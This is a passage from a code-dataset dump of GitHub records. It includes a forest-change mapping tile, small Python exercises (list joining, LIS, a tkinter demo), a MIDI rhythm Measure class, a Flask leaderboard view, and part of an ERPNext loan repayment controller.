self.aoi_model.feature_collection)\n\n # display the aoi\n self.m.addLayer(self.aoi_model.feature_collection, {\"color\": sc.info}, \"aoi\")\n self.m.zoom_ee_object(self.aoi_model.feature_collection.geometry())\n\n # display the forest mask\n self.model.forest_mask, self.model.forest_mask_display = cs.get_forest_mask(\n self.model.forest_map,\n self.model.forest_map_year,\n self.model.treecover,\n self.aoi_model.feature_collection,\n )\n self.m.addLayer(\n self.model.forest_mask_display,\n cp.viz_forest_mask(self.model.forest_map),\n \"Forest mask\",\n )\n\n # remove all already existing fcdm layers\n for layer in self.m.layers:\n if not layer.name in [\"aoi\", \"Forest mask\", \"CartoDB.DarkMatter\"]:\n self.m.remove_layer(layer)\n\n # compute nbr\n analysis_nbr_merge = ee.ImageCollection([])\n reference_nbr_merge = ee.ImageCollection([])\n for sensor in self.model.sensors:\n # analysis period\n # data preparation\n # Calculation of single scenes of Base-NBR\n analysis = cs.get_collection(\n sensor,\n self.model.analysis_start,\n self.model.analysis_end,\n self.model.forest_map,\n self.model.forest_map_year,\n self.model.forest_mask,\n self.model.cloud_buffer,\n self.aoi_model.feature_collection,\n )\n analysis_nbr = analysis.map(partial(cs.compute_nbr, sensor=sensor))\n\n # analysis period\n # data preparation\n # Calculation of single scenes of Base-NBR\n reference = cs.get_collection(\n sensor,\n self.model.reference_start,\n self.model.reference_end,\n self.model.forest_map,\n self.model.forest_map_year,\n self.model.forest_mask,\n self.model.cloud_buffer,\n self.aoi_model.feature_collection,\n )\n\n # current landsat 7/8 products are deprecated. It happens after\n # last_date = {\n # \"landsat 4\": {\"toa\": \"1993-02-14\", \"sr\": \"1993-02-14\"},\n # \"landsat 5\": {\"toa\": \"2011-05-24\", \"sr\": \"2011-05-24\"},\n # \"landsat 7\": {\"toa\": \"2021-12-30\", \"sr\": \"2021-12-30\"},\n # \"landsat 8\": {\"toa\": \"2021-12-29\", \"sr\": \"2021-12-29\"},\n # \"sentinel 2\": {\"toa\": \"2023-07-10\", \"sr\": \"2023-07-10\"},\n # }\n\n # Raise an error if reference and analysis collections are empty\n if not all([reference.size().getInfo(), analysis.size().getInfo()]):\n raise Exception(\n \"Product not available for the selected period. Please use a previous date.\"\n )\n\n reference_nbr = reference.map(partial(cs.compute_nbr, sensor=sensor))\n\n # adjust with kernel\n reference_nbr = reference_nbr.map(\n partial(cs.adjustment_kernel, kernel_size=self.model.kernel_radius)\n )\n analysis_nbr = analysis_nbr.map(\n partial(cs.adjustment_kernel, kernel_size=self.model.kernel_radius)\n )\n\n analysis_nbr_merge = analysis_nbr_merge.merge(analysis_nbr)\n reference_nbr_merge = reference_nbr_merge.merge(reference_nbr)\n\n # Capping of self-referenced single Second-NBR scenes at 0 and -1\n # Condensation of all available self-referenced single Second-NBR scenes per investigation period\n analysis_nbr_norm_min = analysis_nbr_merge.map(cs.capping).qualityMosaic(\"NBR\")\n\n reference_nbr_norm_min = reference_nbr_merge.map(cs.capping).qualityMosaic(\n \"NBR\"\n )\n\n # save the differents layer to download\n datasets = {\"forest mask\": self.model.forest_mask}\n datasets[\"Reference rNBR\"] = reference_nbr_norm_min.select(\"NBR\", \"yearday\")\n datasets[\"Analysis rNBR\"] = analysis_nbr_norm_min.select(\"NBR\", \"yearday\")\n\n # Derive the Delta-NBR result\n nbr_diff = analysis_nbr_norm_min.select(\"NBR\").subtract(\n reference_nbr_norm_min.select(\"NBR\")\n )\n nbr_diff_capped = nbr_diff.select(\"NBR\").where(nbr_diff.select(\"NBR\").lt(0), 0)\n datasets[\"Delta rNBR without DDR filtering\"] = nbr_diff_capped.addBands(\n analysis_nbr_norm_min.select(\"yearday\")\n ).select(\"NBR\", \"yearday\")\n\n # apply the DDR filtering\n nbr_diff_ddr = cs.ddr_filter(\n nbr_diff_capped.select(\"NBR\"),\n self.model.filter_threshod,\n self.model.filter_radius,\n self.model.cleaning_offset,\n )\n datasets[\"Delta rNBR\"] = nbr_diff_ddr.addBands(\n analysis_nbr_norm_min.select(\"yearday\")\n ).select(\"NBR\", \"yearday\")\n\n # debug purpose. Sasve the datasets to the element model\n self.test_datasets = datasets\n\n self.m.addLayer(\n nbr_diff_ddr.select(\"NBR\"),\n {\"min\": [0], \"max\": [0.3], \"palette\": \"D3D3D3,Ce0f0f\"},\n \"Delta-rNBR\",\n )\n\n # add the selected datasets to the export control\n self.tile.save.set_data(datasets)\n self.tile.save.set_prefix(\n self.model.reference_start[:4],\n self.model.reference_end[:4],\n self.model.analysis_start[:4],\n self.model.analysis_end[:4],\n self.aoi_model.name,\n )\n\n # preselect delta-rNBR\n self.tile.save.w_datasets.v_model = [\"Delta rNBR\"]\n\n # give feedback to the user\n self.alert.add_live_msg(cm.complete, \"success\")\n\n return\n","repo_name":"sepal-contrib/fcdm","sub_path":"component/tile/launch_tile.py","file_name":"launch_tile.py","file_ext":"py","file_size_in_byte":7874,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"17243829862","text":"\n# Online Python - IDE, Editor, Compiler, Interpreter\n\ndef list_concat(lists):\n \"\"\"\n Joins given list of lists into a single list\n \"\"\"\n final_list = []\n for sublist in lists:\n final_list.extend(sublist)\n return final_list\n\na = [[1,2,3], [4,5,6], [7,8,9], [10]]\nprint(list_concat(a))\n\n# Output: [1, 2, 3, 4, 5, 6, 7, 8, 9, 10]\n","repo_name":"sanneabhilash/ineuron_datasciencemasters","sub_path":"assignments/python/functions/5.list_concat.py","file_name":"5.list_concat.py","file_ext":"py","file_size_in_byte":351,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"30866008879","text":"class Solution:\n def lengthOfLIS(self, nums: List[int]) -> int:\n seq = []\n for i in nums:\n pos = bisect_left(seq, i)\n \n if pos == len(seq):\n seq.append(i)\n else:\n seq[pos] = i\n \n return len(seq)","repo_name":"Maxwell-Yang-2001/maxwell-yang-leetcode","sub_path":"300-longest-increasing-subsequence/300-longest-increasing-subsequence.py","file_name":"300-longest-increasing-subsequence.py","file_ext":"py","file_size_in_byte":299,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"11539606852","text":"x = int(input())\r\nline = 1\r\nlst = []\r\nfor i in range(1,x+1):\r\n if x > line:\r\n x = x - i\r\n line += 1\r\n lst.append(x)\r\n else:\r\n break\r\nif len(lst)%2 ==0:\r\n a = len(lst) + 2 - x\r\n b = x\r\n print(f\"{a}\"+'/'+f'{b}')\r\nelse:\r\n a = x\r\n b = len(lst) + 2 - x\r\n print(f\"{a}\"+'/'+f'{b}')","repo_name":"HyemIin/algorithm-code-test","sub_path":"백준/Silver/1193. 분수찾기/분수찾기.py","file_name":"분수찾기.py","file_ext":"py","file_size_in_byte":326,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"41892103496","text":"from tkinter import *\n\nmenu= Tk()\nmenu.title(\"Alterar propriedades\")\nmenu.geometry(\"500x500+10+10\")\nmenu['bg']='white'\n\n#botao\nbtn= Button(menu,text=\"Clique\",background=\"green\") #button(objPai, propriedades)\nbtn.pack()\n#botao + eventos\ndef botao_clique(num):\n soma=num\n print('num1 + num2 = ',soma)\n \nbotao= Button(menu,text=\"Executar\", command=lambda:botao_clique(5)) #lambda passa algum valor para funcao\nbotao.pack()\n\n\nmenu.mainloop()","repo_name":"GeilsoFaria/faculdade","sub_path":"aulas/Python/tkinter/alterar-propriedades+botao.py","file_name":"alterar-propriedades+botao.py","file_ext":"py","file_size_in_byte":446,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"756863086","text":"import random\nfrom typing import Union, Collection, Optional, List, Sequence\nfrom copy import deepcopy\nfrom itertools import chain\n\nimport numpy as np\nfrom icecream import ic\n\nfrom MidiCompose.logic.rhythm.beat import Beat\nfrom MidiCompose.utilities import temp_seed,ctx_random_seed\n\n\nclass MeasureIterator:\n\n def __init__(self, measure):\n self._Measure = measure\n self._index = 0\n self._len_Measure = len(self._Measure)\n\n def __next__(self) -> Beat:\n if self._index < self._len_Measure:\n result = self._Measure.beats[self._index]\n self._index += 1\n return result\n else:\n raise StopIteration\n\n\nclass Measure:\n\n def __init__(self,\n beats: Optional[Union[Collection[Union[int, Beat, Collection[int]]]]] = None,\n verbose: bool = False):\n \"\"\"\n Three options for initialization:\n 1) Supply iterable of Beat object. This is useful if passing Beats with pre-defined time_units.\n 2) Supply a collection of collections of integers, where the number of items represents the number\n of time_units, and the values of the integers represents the respective subdivision of each time_units.\n 3) Combination of the previous two.\n\n Note that passing an integer will automatically instantiate an \"empty\" time_units. That is,\n all TimeUnit objects will be set to 0 within that time_units.\n\n :param beats: iterable containing Beat objects, bare integers, or a combination of the two.\n :param verbose: if True, __repr__ gives more info.\n \"\"\"\n\n self.beats: Collection[Beat] = beats # calls setter method\n self.verbose: bool = verbose\n\n\n #### PROPERTIES ####\n\n @property\n def beats(self) -> List[Beat]:\n return self._beats\n\n @beats.setter\n def beats(self, value):\n\n if value is None: # initialize empty measure\n self._beats = []\n else:\n\n value_type_set = set([type(b) for b in value])\n\n beat_set = {Beat}\n int_set = {int}\n col_of_ints_set = {Collection}\n mixed_set = {Beat, int}\n\n # collection of collections of integers\n coll_of_colls = all([issubclass(type(b), Collection) for b in value])\n if coll_of_colls:\n self._beats = [Beat(c) for c in value]\n\n # contains only Beats -- no validation needed\n elif value_type_set.issubset(beat_set):\n self._beats = [v for v in value]\n\n # contains only integers -- validated by Beat constructor\n elif value_type_set.issubset(int_set):\n self._beats = [Beat(a) for a in value]\n\n # contains mixture Beat and int -- validated by Beat constructor\n else:\n _beats = []\n for b in value:\n if type(b) == int:\n _beats.append(Beat(b))\n else:\n _beats.append(b)\n self._beats = _beats\n\n @property\n def n_beats(self):\n return len(self)\n\n @property\n def state(self):\n \"\"\"\n 1-d numeric array containing figure of each time_units in Measure.\n \"\"\"\n beat_states = np.concatenate([b.state for b in self.beats])\n state = np.empty(shape=(beat_states.size + 1,), dtype=np.int8)\n state[0] = -2\n state[1:] = beat_states\n return state\n\n @property\n def active_state(self) -> np.ndarray:\n \"\"\"\n Same as `figure` array but without beat/measure flags.\n \"\"\"\n return np.concatenate([b.active_state for b in self.beats])\n\n @property\n def subdivision_values(self) -> np.ndarray:\n \"\"\"\n Returns a 1d array containing the subdivision of each `Beat` in the `Measure`.\n \"\"\"\n idx_sub_vals = np.where(self.state == -3)[0] + 1\n sub_vals = self.state[idx_sub_vals]\n return sub_vals\n\n @property\n def n_note_on(self) -> int:\n \"\"\"\n The number of \"note_on\" events in the Measure.\n \"\"\"\n return sum([b.n_note_on for b in self.beats])\n\n @property\n def is_active(self):\n if self.n_note_on > 0:\n return True\n else:\n return False\n\n @property\n def flattened(self) -> List[int]:\n _flattened = list(chain(*self))\n return _flattened\n\n #### UTILITY FUNCTIONS ####\n\n # TODO: implement override/reshape checks\n def set_state(self,\n state: [Collection[Collection[int]]],\n override: bool = True,\n reshape: bool = False):\n \"\"\"\n Sets `figure` array as well as `beats` array.\n\n :param override: If False, will raise exception if trying to override a stateful measure.\n :param reshape: If False, will raise exception if `figure` argument would result in \"reshaping\" the measure (ie.\n changing the number of beats, or number of subdivisions in a time_units.)\n \"\"\"\n self.beats = state\n\n def activate_random(self, density: float,\n random_seed: Optional[int] = None,\n beat_idx: Sequence[int] = None):\n\n beats = deepcopy(self.beats)\n\n _beats = []\n with ctx_random_seed(random_seed):\n if beat_idx is None:\n beat_idx = list()\n\n for i,beat in enumerate(beats):\n if i not in beat_idx:\n choices = random.choices(population=[1,0],\n weights=[density,1-density],\n k=len(beat))\n _beat = Beat(choices)\n else:\n _beat = beat\n _beats.append(_beat)\n\n _measure = Measure(_beats)\n return _measure\n\n def sustain_all(self, beat_idx: Optional[Collection[int]] = None):\n \"\"\"\n Convert all \"item-off\" events to \"sustain\" events.\n :param beat_idx: If given, only apply to the given beats.\n \"\"\"\n if beat_idx is not None:\n if max(beat_idx) > len(self.beats):\n msg = f\"`beat_idx` out of range.\"\n raise IndexError(msg)\n else:\n for i in beat_idx:\n self.beats[i].sustain_all()\n else:\n for b in self.beats:\n b.sustain_all()\n\n return self\n\n def shorten_all(self, beat_idx: Optional[Collection[int]] = None):\n \"\"\"\n Convert all \"sustain\" events to \"note_off\" events.\n :param beat_idx: If given, only apply to the given beats.\n \"\"\"\n\n if beat_idx is not None:\n if max(beat_idx) > len(self.beats):\n msg = f\"`beat_idx` out of range.\"\n raise IndexError(msg)\n else:\n for i in beat_idx:\n self.beats[i].shorten_all()\n else:\n for b in self.beats:\n b.shorten_all()\n\n return self\n\n #### GENERATOR FUNCTIONS ####\n\n def get_complement(self,\n adherence: float = 1.0,\n random_seed: Optional[int] = None,\n beat_idx:Optional[Sequence[int]] = None) -> Beat():\n\n raise NotImplementedError()\n\n if adherence > 1 or adherence < 0:\n msg = \"`adherence` must be a float between 0 and 1.\"\n raise ValueError(msg)\n\n if beat_idx is not None:\n e = \"Implement beat indexing!\"\n raise NotImplementedError(e)\n\n #### MAGIC METHODS ####\n\n def __iter__(self):\n return MeasureIterator(self)\n\n def __getitem__(self, item: int) -> Beat:\n return self.beats[item]\n\n def __mul__(self,number: int) -> list:\n return [deepcopy(self) for _ in range(number)]\n\n def __len__(self):\n return len(self.beats)\n\n def __repr__(self):\n r = \"Measure(\"\n beat_strs = [str(b.active_state) for b in self.beats]\n for i,b in enumerate(beat_strs):\n if i < len(beat_strs) - 1:\n r += b + \", \"\n else:\n r += b + \")\"\n return r\n\n\n\n","repo_name":"aParthemer/MidiCompose","sub_path":"MidiCompose/logic/rhythm/measure.py","file_name":"measure.py","file_ext":"py","file_size_in_byte":8224,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"31043282479","text":"from flask import render_template, session, request, flash, redirect\nfrom web.auth import loginrequired\nfrom db import conn\n\n\ndef leaderboard():\n cur = conn.cursor()\n cur.execute(\"SELECT username, sum(score) FROM edits GROUP BY username ORDER BY sum(score) DESC LIMIT 25\")\n users = cur.fetchall()\n return render_template(\"leaderboard.html\",\n thispage='leaderboard',\n users=users)\n","repo_name":"tjcsl/wedge","sub_path":"web/views/leaderboard.py","file_name":"leaderboard.py","file_ext":"py","file_size_in_byte":444,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"38141108409","text":"import frappe\nfrom frappe import _\nfrom frappe.utils import add_days, cint, date_diff, flt, get_datetime, getdate\n\nimport erpnext\nfrom erpnext.accounts.general_ledger import make_gl_entries\nfrom erpnext.controllers.accounts_controller import AccountsController\nfrom erpnext.loan_management.doctype.loan_interest_accrual.loan_interest_accrual import (\n\tget_last_accrual_date,\n\tget_per_day_interest,\n)\nfrom erpnext.loan_management.doctype.loan_security_shortfall.loan_security_shortfall import (\n\tupdate_shortfall_status,\n)\nfrom erpnext.loan_management.doctype.process_loan_interest_accrual.process_loan_interest_accrual import (\n\tprocess_loan_interest_accrual_for_demand_loans,\n)\n\n\nclass LoanRepayment(AccountsController):\n\tdef validate(self):\n\t\tamounts = calculate_amounts(self.against_loan, self.posting_date)\n\t\tself.set_missing_values(amounts)\n\t\tself.check_future_entries()\n\t\tself.validate_amount()\n\t\tself.allocate_amounts(amounts)\n\n\tdef before_submit(self):\n\t\tself.book_unaccrued_interest()\n\n\tdef on_submit(self):\n\t\tself.update_paid_amount()\n\t\tself.update_repayment_schedule()\n\t\tself.make_gl_entries()\n\n\tdef on_cancel(self):\n\t\tself.check_future_accruals()\n\t\tself.update_repayment_schedule(cancel=1)\n\t\tself.mark_as_unpaid()\n\t\tself.ignore_linked_doctypes = [\"GL Entry\"]\n\t\tself.make_gl_entries(cancel=1)\n\n\tdef set_missing_values(self, amounts):\n\t\tprecision = cint(frappe.db.get_default(\"currency_precision\")) or 2\n\n\t\tif not self.posting_date:\n\t\t\tself.posting_date = get_datetime()\n\n\t\tif not self.cost_center:\n\t\t\tself.cost_center = erpnext.get_default_cost_center(self.company)\n\n\t\tif not self.interest_payable:\n\t\t\tself.interest_payable = flt(amounts[\"interest_amount\"], precision)\n\n\t\tif not self.penalty_amount:\n\t\t\tself.penalty_amount = flt(amounts[\"penalty_amount\"], precision)\n\n\t\tif not self.pending_principal_amount:\n\t\t\tself.pending_principal_amount = flt(amounts[\"pending_principal_amount\"], precision)\n\n\t\tif not self.payable_principal_amount and self.is_term_loan:\n\t\t\tself.payable_principal_amount = flt(amounts[\"payable_principal_amount\"], precision)\n\n\t\tif not self.payable_amount:\n\t\t\tself.payable_amount = flt(amounts[\"payable_amount\"], precision)\n\n\t\tshortfall_amount = flt(\n\t\t\tfrappe.db.get_value(\n\t\t\t\t\"Loan Security Shortfall\", {\"loan\": self.against_loan, \"status\": \"Pending\"}, \"shortfall_amount\"\n\t\t\t)\n\t\t)\n\n\t\tif shortfall_amount:\n\t\t\tself.shortfall_amount = shortfall_amount\n\n\t\tif amounts.get(\"due_date\"):\n\t\t\tself.due_date = amounts.get(\"due_date\")\n\n\tdef check_future_entries(self):\n\t\tfuture_repayment_date = frappe.db.get_value(\n\t\t\t\"Loan Repayment\",\n\t\t\t{\"posting_date\": (\">\", self.posting_date), \"docstatus\": 1, \"against_loan\": self.against_loan},\n\t\t\t\"posting_date\",\n\t\t)\n\n\t\tif future_repayment_date:\n\t\t\tfrappe.throw(\"Repayment already made till date {0}\".format(get_datetime(future_repayment_date)))\n\n\tdef validate_amount(self):\n\t\tprecision = cint(frappe.db.get_default(\"currency_precision\")) or 2\n\n\t\tif not self.amount_paid:\n\t\t\tfrappe.throw(_(\"Amount paid cannot be zero\"))\n\n\tdef book_unaccrued_interest(self):\n\t\tprecision = cint(frappe.db.get_default(\"currency_precision\")) or 2\n\t\tif flt(self.total_interest_paid, precision) > flt(self.interest_payable, precision):\n\t\t\tif not self.is_term_loan:\n\t\t\t\t# get last loan interest accrual date\n\t\t\t\tlast_accrual_date = get_last_accrual_date(self.against_loan)\n\n\t\t\t\t# get posting date upto which interest has to be accrued\n\t\t\t\tper_day_interest = get_per_day_interest(\n\t\t\t\t\tself.pending_principal_amount, self.rate_of_interest, self.posting_date\n\t\t\t\t)\n\n\t\t\t\tno_of_days = (\n\t\t\t\t\tflt(flt(self.total_interest_paid - self.interest_payable, precision) / per_day_interest, 0)\n\t\t\t\t\t- 1\n\t\t\t\t)\n\n\t\t\t\tposting_date = add_days(last_accrual_date, no_of_days)\n\n\t\t\t\t# book excess interest paid\n\t\t\t\tprocess = process_loan_interest_accrual_for_demand_loans(\n\t\t\t\t\tposting_date=posting_date, loan=self.against_loan, accrual_type=\"Repayment\"\n\t\t\t\t)\n\n\t\t\t\t# get loan interest accrual to update paid amount\n\t\t\t\tlia = frappe.db.get_value(\n\t\t\t\t\t\"Loan Interest Accrual\",\n\t\t\t\t\t{\"process_loan_interest_accrual\": process},\n\t\t\t\t\t[\"name\", \"interest_amount\", \"payable_principal_amount\"],\n\t\t\t\t\tas_dict=1,\n\t\t\t\t)\n\n\t\t\t\tif lia:\n\t\t\t\t\tself.append(\n\t\t\t\t\t\t\"repayment_details\",\n\t\t\t\t\t\t{\n\t\t\t\t\t\t\t\"loan_interest_accrual\": lia.name,\n\t\t\t\t\t\t\t\"paid_interest_amount\": flt(self.total_interest_paid - self.interest_payable, precision),\n\t\t\t\t\t\t\t\"paid_principal_amount\": 0.0,\n\t\t\t\t\t\t\t\"accrual_type\": \"Repayment\",\n\t\t\t\t\t\t},\n\t\t\t\t\t)\n\n\tdef update_paid_amount(self):\n\t\tloan = frappe.get_value(\n\t\t\t\"Loan\",\n\t\t\tself.against_loan,\n\t\t\t[\n\t\t\t\t\"total_amount_paid\",\n\t\t\t\t\"total_principal_paid\",\n\t\t\t\t\"status\",\n\t\t\t\t\"is_secured_loan\",\n\t\t\t\t\"total_payment\",\n\t\t\t\t\"loan_amount\",\n\t\t\t\t\"disbursed_amount\",\n\t\t\t\t\"total_interest_payable\",\n\t\t\t\t\"written_off_amount\",\n\t\t\t],\n\t\t\tas_dict=1,\n\t\t)\n\n\t\tloan.update(\n\t\t\t{\n\t\t\t\t\"total_amount_paid\": loan.total_amount_paid + self.amount_paid,\n\t\t\t\t\"total_principal_paid\": loan.total_principal_paid + self.principal_amount_paid,\n\t\t\t}\n\t\t)\n\n\t\tpending_principal_amount = get_pending_principal_amount(loan)\n\t\tif not loan.is_secured_loan and pending_principal_amount <= 0:\n\t\t\tloan.update({\"status\": \"Loan Closure Requested\"})\n\n\t\tfor payment in self.repayment_details:\n\t\t\tfrappe.db.sql(\n\t\t\t\t\"\"\" UPDATE `tabLoan Interest Accrual`\n\t\t\t\tSET paid_principal_amount = `paid_principal_amount` + %s,\n\t\t\t\t\tpaid_interest_amount = `paid_interest_amount` + %s\n\t\t\t\tWHERE name = %s\"\"\",\n\t\t\t\t(\n\t\t\t\t\tflt(payment.paid_principal_amount),\n\t\t\t\t\tflt(payment.paid_interest_amount),\n\t\t\t\t\tpayment.loan_interest_accrual,\n\t\t\t\t),\n\t\t\t)\n\n\t\tfrappe.db.sql(\n\t\t\t\"\"\" UPDATE `tabLoan`\n\t\t\tSET total_amount_paid = %s, total_principal_paid = %s, status = %s\n\t\t\tWHERE name = %s \"\"\",\n\t\t\t(loan.total_amount_paid, loan.total_principal_paid, loan.status, self.against_loan),\n\t\t)\n\n\t\tupdate_shortfall_status(self.against_loan, self.principal_amount_paid)\n\n\tdef mark_as_unpaid(self):\n\t\tloan = frappe.get_value(\n\t\t\t\"Loan\",\n\t\t\tself.against_loan,\n\t\t\t[\n\t\t\t\t\"total_amount_paid\",\n\t\t\t\t\"total_principal_paid\",\n\t\t\t\t\"status\",\n\t\t\t\t\"is_secured_loan\",\n\t\t\t\t\"total_payment\",\n\t\t\t\t\"loan_amount\",\n\t\t\t\t\"disbursed_amount\",\n\t\t\t\t\"total_interest_payable\",\n\t\t\t\t\"written_off_amount\",\n\t\t\t],\n\t\t\tas_dict=1,\n\t\t)\n\n\t\tno_of_repayments = len(self.repayment_details)\n\n\t\tloan.update(\n\t\t\t{\n\t\t\t\t\"total_amount_paid\": loan.total_amount_paid - self.amount_paid,\n\t\t\t\t\"total_principal_paid\": loan.total_principal_paid - self.principal_amount_paid,\n\t\t\t}\n\t\t)\n\n\t\tif loan.status == \"Loan Closure Requested\":\n\t\t\tif loan.disbursed_amount >= loan.loan_amount:\n\t\t\t\tloan[\"status\"] = \"Disbursed\"\n\t\t\telse:\n\t\t\t\tloan[\"status\"] = \"Partially Disbursed\"\n\n\t\tfor payment in self.repayment_details:\n\t\t\tfrappe.db.sql(\n\t\t\t\t\"\"\" UPDATE `tabLoan Interest Accrual`\n\t\t\t\tSET paid_principal_amount = `paid_principal_amount` - %s,\n\t\t\t\t\tpaid_interest_amount = `paid_interest_amount` - %s\n\t\t\t\tWHERE name = %s\"\"\",\n\t\t\t\t(payment.paid_principal_amount, payment.paid_interest_amount, payment.loan_interest_accrual),\n\t\t\t)\n\n\t\t\t# Cancel repayment interest accrual\n\t\t\t# checking idx as a preventive measure, repayment accrual will always be the last entry\n\t\t\tif payment.accrual_type == \"Repayment\" and payment.idx == no_of_repayments:\n\t\t\t\tlia_doc = frappe.get_doc(\"Loan Interest Accrual\", payment.loan_interest_accrual)\n\t\t\t\tlia_doc.cancel()\n\n\t\tfrappe.db.sql(\n\t\t\t\"\"\" UPDATE `tabLoan`\n\t\t\tSET total_amount_paid = %s, total_principal_paid = %s, status = %s\n\t\t\tWHERE name = %s \"\"\",\n\t\t\t(loan.total_amount_paid, loan.total_principal_paid, loan.status, self.against_loan),\n\t\t)\n\n\tdef check_future_accruals(self):\n\t\tfuture_accrual_date = frappe.db.get_value(\n\t\t\t\"Loan Interest Accrual\",\n\t\t\t{\"posting_date\": (\">\", self.posting_date), \"docstatus\": 1, \"loan\": self.against_loan},\n\t\t\t\"posting_date\",\n\t\t)\n\n\t\tif future_accrual_date:\n\t\t\tfrappe.throw(\n\t\t\t\t\"Cannot cancel. Interest accruals already processed till {0}\".format(\n\t\t\t\t\tget_datetime(future_accrual_date)\n\t\t\t\t)\n\t\t\t)\n\n\tdef update_repayment_schedule(self, cancel=0):\n\t\tif self.is_term_loan and self.principal_amount_paid > self.payable_principal_amount:\n\t\t\tregenerate_repayment_schedule(self.against_loan, cancel)\n\n\tdef allocate_amounts(self, repayment_details):\n\t\tprecision = cint(frappe.db.get_default(\"currency_precision\")) or 2\n\t\tself.set(\"repayment_details\", [])\n\t\tself.principal_amount_paid = 0\n\t\tself.total_penalty_paid = 0\n\t\tinterest_paid = self.amount_paid\n\n\t\tif self.shortfall_amount and self.amount_paid > self.shortfall_amount:\n\t\t\tself.principal_amount_paid = self.shortfall_amount\n\t\telif self.shortfall_amount:\n\t\t\tself.principal_amount_paid = self.amount_paid\n\n\t\tinterest_paid -= self.principal_amount_paid\n\n\t\tif interest_paid > 0:\n\t\t\tif self.penalty_amount and interest_paid > self.penalty_amount:\n\t\t\t\tself.total_penalty_paid = flt(self.penalty_amount, precision)\n\t\t\telif self.penalty_amount:\n\t\t\t\tself.total_penalty_paid = flt(interest_paid, precision)\n\n\t\t\tinterest_paid -= self.total_penalty_paid\n\n\t\tif self.is_term_loan:\n\t\t\tinterest_paid, updated_entries = self.allocate_interest_amount(interest_paid, repayment_details)\n\t\t\tself.allocate_principal_amount_for_term_loans(interest_paid, repayment_details, updated_entries)\n\t\telse:\n\t\t\tinterest_paid, updated_entries = self.allocate_interest_amount(interest_paid, repayment_details)\n\t\t\tself.allocate_excess_payment_for_demand_loans(interest_paid, repayment_details)\n\n\tdef allocate_interest_amount(self, interest_paid, repayment_details):\n\t\tupdated_entries = {}\n\t\tself.total_interest_paid = 0\n\t\tidx = 1\n\n\t\tif interest_paid > 0:\n\t\t\tfor lia, amounts in repayment_details.get(\"pending_accrual_entries\", []).items():\n\t\t\t\tinterest_amount = 0\n\t\t\t\tif amounts[\"interest_amount\"] <= interest_paid:\n\t\t\t\t\tinterest_amount = amounts[\"interest_amount\"]\n\t\t\t\t\tself.total_interest_paid += interest_amount\n\t\t\t\t\tinterest_paid -= interest_amount\n\t\t\t\telif interest_paid:\n\t\t\t\t\tif interest_paid >= amounts[\"interest_amount\"]:\n\t\t\t\t\t\tinterest_amount = amounts[\"interest_amount\"]\n\t\t\t\t\t\tself.total_interest_paid += interest_amount\n\t\t\t\t\t\tinterest_paid = 0\n\t\t\t\t\telse:\n\t\t\t\t\t\tinterest_amount = interest_paid\n\t\t\t\t\t\tself.total_interest_paid += interest_amount\n\t\t\t\t\t\tinterest_paid = 0\n\n\t\t\t\tif interest_amount:\n\t\t\t\t\tself.append(\n\t\t\t\t\t\t\"repayment_details\",\n\t\t\t\t\t\t{\n\t\t\t\t\t\t\t\"loan_interest_accrual\": lia,\n\t\t\t\t\t\t\t\"paid_interest_amount\": interest_amount,\n\t\t\t\t\t\t\t\"paid_principal_amount\": 0,\n\t\t\t\t\t\t},\n\t\t\t\t\t)\n\t\t\t\t\tupdated_entries[lia] = idx\n\t\t\t\t\tidx += 1\n\n\t\treturn interest_paid, updated_entries\n\n\tdef allocate_principal_amount_for_term_loans(\n\t\tself, interest_paid, repayment_details, updated_entries\n\t):\n\t\tif interest_paid > 0:\n\t\t\tfor lia, amounts in repayment_details.get(\"pending_accrual_entries\", []).items():\n\t\t\t\tpaid_principal = 0\n\t\t\t\tif amounts[\"payable_principal_amount\"] <= interest_paid:\n\t\t\t\t\tpaid_principal = amounts[\"payable_principal_amount\"]\n\t\t\t\t\tself.principal_amount_paid += paid_principal\n\t\t\t\t\tinterest_paid -= paid_principal\n\t\t\t\telif interest_paid:\n\t\t\t\t\tif interest_paid >= amounts[\"payable_principal_amount\"]:\n\t\t\t\t\t\tpaid_principal = amounts[\"payable_principal_amount\"]\n\t\t\t\t\t\tself.principal_amount_paid += paid_principal\n\t\t\t\t\t\tinterest_paid = 0\n\t\t\t\t\telse:\n\t\t\t\t\t\tpaid_principal = interest_paid\n\t\t\t\t\t\tself.principal_amount_paid += paid_principal\n\t\t\t\t\t\tinterest_paid = 0\n\n\t\t\t\tif updated_entries.get(lia):\n\t\t\t\t\tidx = updated_entries.get(lia)\n\t\t\t\t\tself.get(\"repayment_details\")[idx - 1].paid_principal_amount += paid_principal\n\t\t\t\telse:\n\t\t\t\t\tself.append(\n\t\t\t\t\t\t\"repayment_details\",\n\t\t\t\t\t\t{\n\t\t\t\t\t\t\t\"loan_interest_accrual\": lia,\n\t\t\t\t\t\t\t\"paid_interest_amount\": 0,\n\t\t\t\t\t\t\t\"paid_principal_amount\": paid_principal,\n\t\t\t\t\t\t},\n\t\t\t\t\t)\n\n\t\tif interest_paid > 0:\n\t\t\tself.principal_amount_paid += interest_paid\n\n\tdef allocate_excess_payment_for_demand_loans(self, interest_paid, repayment_details):\n\t\tif repayment_details[\"unaccrued_interest\"] and interest_paid > 0:\n\t\t\t# no of days for which to accrue interest\n\t\t\t# Interest can only be accrued for an entire day and not partial\n\t\t\tif interest_paid > repayment_details[\"unaccrued_interest\"]:\n\t\t\t\tinterest_paid -= repayment_details[\"unaccrued_interest\"]\n\t\t\t\tself.total_interest_paid += repayment_details[\"unaccrued_interest\"]\n\t\t\telse:\n\t\t\t\t# get no of days for which interest can be paid\n\t\t\t\tper_day_interest = get_per_day_interest(\n\t\t\t\t\tself.pending_principal_amount, self.rate_of_interest, self.posting_date\n\t\t\t\t)\n\n\t\t\t\tno_of_days = cint(interest_paid / per_day_interest)\n\t\t\t\tself.total_interest_paid += no_of_days * per_day_interest\n\t\t\t\tinterest_paid -= no_of_days * per_day_interest\n\n\t\tif interest_paid > 